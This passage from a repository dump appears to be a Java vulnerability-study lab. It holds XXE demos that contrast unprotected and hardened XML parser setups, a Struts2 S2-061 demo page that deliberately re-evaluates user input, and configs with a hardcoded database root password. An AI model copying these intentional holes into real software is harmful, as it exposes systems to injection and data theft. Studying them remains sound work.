sf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); 38 | sf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, ""); 39 | StreamSource source = new 
StreamSource(byteArrayInputStream); 40 | TransformerHandler transformerHandler = sf.newTransformerHandler(source); 41 | // 创建Result对象,并通过transformerHandler将目的流与其关联 42 | Result result = new StreamResult(System.out); 43 | transformerHandler.setResult(result); 44 | } catch (Exception e) { 45 | e.printStackTrace(); 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/TransformerFactoryXXE.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.securitymissconfig.xxe; 2 | 3 | import javax.xml.XMLConstants; 4 | import javax.xml.transform.TransformerException; 5 | import javax.xml.transform.TransformerFactory; 6 | import javax.xml.transform.stream.StreamResult; 7 | import javax.xml.transform.stream.StreamSource; 8 | import java.io.ByteArrayInputStream; 9 | 10 | public class TransformerFactoryXXE extends XXE { 11 | public static void main(String[] args) { 12 | new TransformerFactoryXXE().test(); 13 | } 14 | @Override 15 | void readNoFixXxe() { 16 | try { 17 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes()); 18 | TransformerFactory tf = TransformerFactory.newInstance(); 19 | StreamSource source = new StreamSource(byteArrayInputStream); 20 | tf.newTransformer().transform(source, new StreamResult(System.out)); 21 | } catch (TransformerException e) { 22 | e.printStackTrace(); 23 | } 24 | } 25 | 26 | @Override 27 | void readWithFixXxe() { 28 | try { 29 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes()); 30 | TransformerFactory tf = TransformerFactory.newInstance(); 31 | tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); 32 | tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, ""); 33 | StreamSource source = new StreamSource(byteArrayInputStream); 34 | tf.newTransformer().transform(source, new 
StreamResult(System.out)); 35 | } catch (TransformerException e) { 36 | e.printStackTrace(); 37 | } 38 | } 39 | } 40 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/XXE.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.securitymissconfig.xxe; 2 | 3 | abstract class XXE { 4 | abstract void readNoFixXxe(); 5 | abstract void readWithFixXxe(); 6 | 7 | void test(){ 8 | System.out.println("\n---------This is result with xxe!-------------"); 9 | this.readNoFixXxe(); 10 | System.out.println("\n---------This is result fixing xxe patch!-------------"); 11 | this.readWithFixXxe(); 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /owasp/src/main/resources/hibernate.cfg.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 9 | thread 10 | 11 | com.mysql.cj.jdbc.Driver 12 | jdbc:mysql://localhost:3306/users?serverTimezone=UTC 13 | root 14 | 1qazXSW@3edc 15 | 16 | 17 | true 18 | 19 | true 20 | 21 | 22 | org.hibernate.dialect.MySQLDialect 23 | 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /owasp/src/main/resources/imgs/111.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/src/main/resources/imgs/111.png -------------------------------------------------------------------------------- /owasp/src/main/resources/mybatis-config.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- 
/owasp/src/main/resources/tmp/tmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/src/main/resources/tmp/tmp -------------------------------------------------------------------------------- /owasp/src/main/resources/user_db.sql: -------------------------------------------------------------------------------- 1 | create database users; 2 | use users; 3 | create table user 4 | ( 5 | id INT(20) NOT NULL, 6 | name VARCHAR(20), 7 | password VARCHAR(20), 8 | date DATE, 9 | PRIMARY KEY (id) 10 | ) engine = innodb 11 | default charset = 'utf8'; 12 | insert into user values(1,'zhansan','111','2021-01-01'); 13 | insert into user values(2,'lisi','111','2021-01-01'); 14 | insert into user values(3,'wangwu','111','2021-01-01'); 15 | insert into user values(4,'wangqiang','111','2021-01-01'); -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/cors/Cors.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/cors/Cors.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/file/FileDelete.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/file/FileDelete.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/file/FileUnzip.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/file/FileUnzip.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/file/FileUploadOrDownload.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/file/FileUploadOrDownload.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/command/ProcessCmdInject.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/command/ProcessCmdInject.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/command/RuntimeCmdInject.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/command/RuntimeCmdInject.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/expression/mvel/MvelTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/mvel/MvelTest.class -------------------------------------------------------------------------------- 
/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/OgnlTest$1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/OgnlTest$1.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/OgnlTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/OgnlTest.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/bean/School.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/bean/School.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/bean/SchoolMaster.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/bean/SchoolMaster.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/bean/Student.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/bean/Student.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/expression/spel/SpelTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/spel/SpelTest.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/redirect/UrlRedirect.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/redirect/UrlRedirect.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/HibernateSqli.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/HibernateSqli.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/pojo/User.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/pojo/User.class -------------------------------------------------------------------------------- 
/owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/pojo/User.hbm.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/utils/HibernateUtils.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/utils/HibernateUtils.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/sqli/jdbc/JdbcSqli.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/jdbc/JdbcSqli.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/MybatisSqli.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/MybatisSqli.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/dao/UserMapper.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/dao/UserMapper.class 
-------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/dao/UserMapper.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 10 | 13 | 16 | 19 | 20 | 21 | 22 | 25 | 28 | 34 | 37 | 49 | -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/pojo/User.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/pojo/User.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/utils/MybatisUtils.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/utils/MybatisUtils.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/BypassByClassloader.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/BypassByClassloader.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/BypassByReflection.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/BypassByReflection.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/Evil.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/Evil.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/MyClassLoader.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/MyClassLoader.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/SetSecurityManagerNullBypass.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/SetSecurityManagerNullBypass.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/CreatePolicy.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/CreatePolicy.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/TestFilePolicy$1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/TestFilePolicy$1.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/TestFilePolicy.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/TestFilePolicy.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/DocumentBuilderXXE.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/DocumentBuilderXXE.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/Payloads.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/Payloads.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXBuilderXXE.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXBuilderXXE.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXHandel.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXHandel.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXParserFactoryXXE.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXParserFactoryXXE.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXReadXXE.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXReadXXE.class -------------------------------------------------------------------------------- 
/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXTransformerFactoryXXE.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXTransformerFactoryXXE.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/TransformerFactoryXXE.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/TransformerFactoryXXE.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/XXE.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/XXE.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/ssrf/Ssrf.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/ssrf/Ssrf.class -------------------------------------------------------------------------------- /owasp/target/classes/hibernate.cfg.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 9 | thread 10 | 11 | com.mysql.cj.jdbc.Driver 12 | jdbc:mysql://localhost:3306/users?serverTimezone=UTC 13 | root 14 | 1qazXSW@3edc 15 | 16 | 17 | true 18 | 19 | 
true 20 | 21 | 22 | org.hibernate.dialect.MySQLDialect 23 | 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /owasp/target/classes/mybatis-config.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /owasp/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst: -------------------------------------------------------------------------------- 1 | com\r17a\commonvuln\injection\sqli\hibernate\pojo\User.class 2 | com\r17a\commonvuln\securitymissconfig\securitymanager\BypassByReflection.class 3 | com\r17a\commonvuln\securitymissconfig\securitymanager\policy\TestFilePolicy$1.class 4 | com\r17a\commonvuln\injection\expression\ognl\OgnlTest.class 5 | com\r17a\commonvuln\injection\sqli\mybatis\pojo\User.class 6 | com\r17a\commonvuln\injection\command\ProcessCmdInject.class 7 | com\r17a\commonvuln\injection\sqli\nativesql\NativeSqli.class 8 | com\r17a\commonvuln\securitymissconfig\xxe\SAXTransformerFactoryXXE.class 9 | com\r17a\commonvuln\file\FileDelete.class 10 | com\r17a\commonvuln\securitymissconfig\xxe\SAXHandel.class 11 | com\r17a\commonvuln\injection\expression\ognl\bean\Student.class 12 | com\r17a\commonvuln\securitymissconfig\xxe\DocumentBuilderXXE.class 13 | com\r17a\commonvuln\securitymissconfig\securitymanager\Evil.class 14 | com\r17a\commonvuln\injection\redirect\UrlRedirect.class 15 | com\r17a\commonvuln\injection\sqli\hibernate\HibernateSqli.class 16 | com\r17a\commonvuln\securitymissconfig\securitymanager\SetSecurityManagerNullBypass.class 17 | com\r17a\commonvuln\injection\expression\mvel\MvelTest.class 18 | com\r17a\commonvuln\securitymissconfig\securitymanager\policy\TestFilePolicy.class 19 | com\r17a\commonvuln\injection\sqli\mybatis\MybatisSqli.class 20 | 
com\r17a\commonvuln\file\FileUnzip.class 21 | com\r17a\commonvuln\securitymissconfig\securitymanager\policy\CreatePolicy.class 22 | com\r17a\commonvuln\securitymissconfig\securitymanager\BypassByClassloader.class 23 | com\r17a\commonvuln\injection\expression\ognl\bean\SchoolMaster.class 24 | com\r17a\commonvuln\securitymissconfig\securitymanager\MyClassLoader.class 25 | com\r17a\commonvuln\securitymissconfig\xxe\Payloads.class 26 | com\r17a\commonvuln\injection\sqli\mybatis\utils\MybatisUtils.class 27 | com\r17a\commonvuln\injection\expression\spel\SpelTest.class 28 | com\r17a\commonvuln\injection\sqli\jdbc\JdbcSqli.class 29 | com\r17a\commonvuln\file\FileUploadOrDownload.class 30 | com\r17a\commonvuln\securitymissconfig\xxe\SAXBuilderXXE.class 31 | com\r17a\commonvuln\cors\Cors.class 32 | com\r17a\commonvuln\ssrf\Ssrf.class 33 | com\r17a\commonvuln\injection\expression\ognl\OgnlTest$1.class 34 | com\r17a\commonvuln\securitymissconfig\xxe\SAXReadXXE.class 35 | com\r17a\commonvuln\securitymissconfig\xxe\XXE.class 36 | com\r17a\commonvuln\injection\command\RuntimeCmdInject.class 37 | com\r17a\commonvuln\injection\expression\ognl\bean\School.class 38 | com\r17a\commonvuln\securitymissconfig\xxe\TransformerFactoryXXE.class 39 | com\r17a\commonvuln\injection\sqli\hibernate\utils\HibernateUtils.class 40 | com\r17a\commonvuln\securitymissconfig\xxe\SAXParserFactoryXXE.class 41 | -------------------------------------------------------------------------------- /pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | com.r17a 8 | JavaVulnSummary 9 | pom 10 | 1.0-SNAPSHOT 11 | 12 | fastjson 13 | jenkins 14 | jndi 15 | ysoserial 16 | weblogic 17 | xstream 18 | owasp 19 | common 20 | struts2 21 | confluence 22 | jboss 23 | log4j 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /struts2/src/main/java/com/r17a/action/IndexAction.java: 
-------------------------------------------------------------------------------- 1 | package com.r17a.action; 2 | 3 | import com.opensymphony.xwork2.ActionSupport; 4 | 5 | /** 6 | * Struts2 action behind the "S2-061 demo" page (index.jsp); this lab code is based on vulhub. changeId() does no work and always returns SUCCESS. The id property is presumably bound from the request through setId() (verify against struts.xml); treat it as untrusted input, since index.jsp echoes ${id} and states that it is evaluated again in the id attribute. 7 | * TODO config tomcat 8 | * */ 9 | public class IndexAction extends ActionSupport { 10 | 11 | private String id; 12 | 13 | 14 | public String changeId(){ 15 | return SUCCESS; 16 | } 17 | 18 | public String getId() { 19 | return id; 20 | } 21 | 22 | public void setId(String id) { 23 | this.id = id; 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /struts2/src/main/resources/struts.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | index.jsp 14 | 15 | 16 | -------------------------------------------------------------------------------- /struts2/src/main/webapp/WEB-INF/web.xml: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | struts2 8 | org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter 9 | 10 | 11 | struts2 12 | /* 13 | 14 | -------------------------------------------------------------------------------- /struts2/src/main/webapp/index.jsp: -------------------------------------------------------------------------------- 1 | <%@ page 2 | language="java" 3 | contentType="text/html; charset=UTF-8" 4 | pageEncoding="UTF-8" %> 5 | <%@ taglib prefix="s" uri="/struts-tags" %> 6 | 7 | 8 | 9 | S2-061 demo 10 | 11 | 12 | 13 | your input id: ${id} 14 |
has been evaluated again in id attribute 15 |
16 | 17 | -------------------------------------------------------------------------------- /struts2/target/classes/com/r17a/action/IndexAction.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/classes/com/r17a/action/IndexAction.class -------------------------------------------------------------------------------- /struts2/target/classes/struts.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | index.jsp 14 | 15 | 16 | -------------------------------------------------------------------------------- /struts2/target/struts2.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2.war -------------------------------------------------------------------------------- /struts2/target/struts2/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Created-By: IntelliJ IDEA 3 | Built-By: 29176 4 | Build-Jdk: 1.8.0_181 5 | 6 | -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/classes/com/r17a/action/IndexAction.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/classes/com/r17a/action/IndexAction.class -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/classes/struts.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | index.jsp 14 | 15 | 16 | 
-------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/lib/commons-collections-3.2.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/commons-collections-3.2.2.jar -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/lib/commons-fileupload-1.4.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/commons-fileupload-1.4.jar -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/lib/commons-io-2.6.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/commons-io-2.6.jar -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/lib/commons-lang3-3.8.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/commons-lang3-3.8.1.jar -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/lib/freemarker-2.3.30.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/freemarker-2.3.30.jar -------------------------------------------------------------------------------- 
/struts2/target/struts2/WEB-INF/lib/javassist-3.20.0-GA.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/javassist-3.20.0-GA.jar -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/lib/log4j-api-2.12.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/log4j-api-2.12.1.jar -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/lib/ognl-3.1.28.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/ognl-3.1.28.jar -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/lib/struts2-core-2.5.25.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/struts2-core-2.5.25.jar -------------------------------------------------------------------------------- /struts2/target/struts2/WEB-INF/web.xml: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | struts2 8 | org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter 9 | 10 | 11 | struts2 12 | /* 13 | 14 | -------------------------------------------------------------------------------- /struts2/target/struts2/index.jsp: -------------------------------------------------------------------------------- 1 | <%@ page 2 | language="java" 3 | 
